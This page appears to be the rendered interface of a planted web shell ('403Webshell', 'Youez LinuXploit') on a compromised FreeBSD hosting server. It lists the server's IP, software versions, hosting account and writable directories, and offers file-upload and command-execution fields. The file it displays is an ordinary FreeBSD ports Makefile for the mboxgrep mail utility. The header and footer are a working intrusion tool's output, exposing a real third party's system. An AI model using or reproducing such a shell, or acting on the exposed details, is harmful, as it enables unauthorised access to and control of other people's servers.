403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/mboxgrep/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/mboxgrep/Makefile
PORTNAME=	mboxgrep
PORTVERSION=	0.7.9
PORTREVISION=	5
CATEGORIES=	mail
MASTER_SITES=	SF

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Utility to scan mailboxes for messages matching a regular expression
WWW=		http://mboxgrep.sourceforge.net/

LICENSE=	GPLv2+
LICENSE_FILE=	${WRKSRC}/COPYING

USES=		localbase ssl
GNU_CONFIGURE=	yes

CFLAGS+=	-I${OPENSSLINC}
LIBS+=		-L${OPENSSLLIB}

INFO=		mboxgrep

PORTDOCS=	ChangeLog NEWS README TODO
PLIST_FILES=	bin/mboxgrep \
		man/man1/mboxgrep.1.gz

OPTIONS_DEFINE=	DOCS PCRE

PCRE_LIB_DEPENDS=	libpcre.so:devel/pcre

pre-configure:
	@${REINPLACE_CMD} -e 's,void \*tmpp,FILE \*tmpp,g' ${WRKSRC}/src/main.c
	@${REINPLACE_CMD} -e 's,$$(mandir),$$(DESTDIR)$$(mandir),g' \
		-e 's,$$(infodir),$$(DESTDIR)$$(infodir),g' \
		${WRKSRC}/src/Makefile.in ${WRKSRC}/doc/Makefile.in

post-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
.for f in ${PORTDOCS}
	${INSTALL_DATA} ${WRKSRC}/${f} ${STAGEDIR}${DOCSDIR}/
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit